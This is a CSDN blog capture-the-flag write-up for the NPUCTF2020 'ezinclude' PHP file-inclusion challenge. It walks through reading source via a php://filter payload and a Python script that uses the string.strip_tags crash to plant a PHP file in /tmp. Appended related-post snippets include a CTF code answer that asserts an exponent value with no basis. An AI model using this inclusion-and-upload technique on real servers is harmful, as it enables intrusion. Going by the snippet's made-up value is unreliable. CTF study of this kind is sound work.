[NPUCTF2020]ezinclude

最新推荐文章于 2024-02-25 15:43:33 发布
最新推荐文章于 2024-02-25 15:43:33 发布
阅读量630 收藏 1
点赞数
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62905261/article/details/125944893
版权

[NPUCTF2020]ezinclude

 f12查看源码发现哈希长度拓展攻击,并发现了hash值

 抓包查看一下,发现bp也给了hash

 直接pass一下,发现了flflflflag.php

 进入flflflflag.php查看一下

 发现了404.html,在网页进入的时候真的就出现了404

 

 用伪协议读一下源码:

/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=flflflflag.php

 base64解密得到源码,发现过滤了data、input、zip

 这时候可以利用:php://filter/string.strip_tags来导致php崩溃,但是可以上传文件保存在/tmp目录,我们直接上传木马,脚本小子火速出击:

import requests
from io import BytesIO
 
url = "http://daf37d2a-5017-47b7-a42b-71db66a88c63.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
 
phpfile = "<?php phpinfo(); ?>"
filedata = {
    "file":phpfile
}
 
bak = requests.post(url=url, files=filedata)
print(bak.text)

运行了之后,不出意外的页面崩溃了:

进入dir.php查看发现木马已上传:

bp直接查看即可得到flag

一夜至秋.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NPUCTF2020]EzRSA
2er0!=O的博客
07-25 538
[NPUCTF2020]EzRSA 附件: from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fla
[NPUCTF2020]ezinclude 1
weixin_46196627的博客
02-09 337
大致意思是:使用伪协议php://filter中的string.strip_stags 过滤器 并上传文件 php的垃圾回收机制就不会继续执行 使post传递的文件存储在/temp/文件下。name=1&pass=cookie值 抓包发现 flflflag.php文件。得到$_get[‘file’] include 使用php://filter 对代码读取。php7.0.0-7.1.2可以利用。php7.1.3-7.2.1可以利用。php7.2.2-7.2.8可以利用。源代码get参数进行文件包含。
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
解读“模块的沟通”
08-04
在数字电路设计中,尤其是使用硬件描述语言如Verilog进行设计时,模块间的通信是非常关键的一个环节。这里的“模块的沟通”是指不同模块之间通过信号交互来传递信息和协调操作的过程。本文将深入探讨这一概念,并以...
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
[NPUCTF2020]ezinclude ---不会编程的崽
最新发布
不会编程的崽的博客
02-25 771
php://filter/string.strip_tags导致php崩溃清空堆栈重启
[NPUCTF2020]ezinclude 文件包含两大 getshell方式
m0_64180167的博客
10-11 994
说一下我的思路吧robots没有扫描发现存在 dir.php然后404.html 报错这个又正好存在漏洞 所以前面全去看这个了结果根本不是这样做。。。正确的思路是这样发现变量 认为是 name和 pass传递参数或者通过爆破 但是太慢了我们可以抓包测试发现了 hash 因为提示我们MD5 所以我们需要注意然后我们传递一个?name=2发现hash变了 这里我们就多半能确定 cookie是我们的pass因为 name改变 cookie也改变 然后都是hash值。
--------已搬运--------[NPUCTF2020]ezinclude - 文件包含 --- php7 漏洞 --。string.strip_tags SegmentFault
Zero_Adam的博客
03-27 698
目录:一、自己做:二、不足:三、 学习WP:新知识!!!string.strip_tags 一、自己做: 0入门,,连接:https://buuoj.cn/challenges#[NPUCTF2020]ezinclude 二、不足: 看到刚开始的提示就蒙了,没有想到传参这么简单 看到了include,文件包含的漏洞,第一时间没有想到用php的伪协议去读取文件,,,除了filter等等,zip也可以上传木马的呀,这个别忘了,,, 三、 学习WP: 看到这个, 像md5拓展攻击,然后抓包看一下, 一看,
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
根据提示,在代码注释中可以找到隐藏的 `e` 值。以下是给定代码的修改版本,以显示隐藏的 `e` 值: ```python from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) # Hidden e = 65537 q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值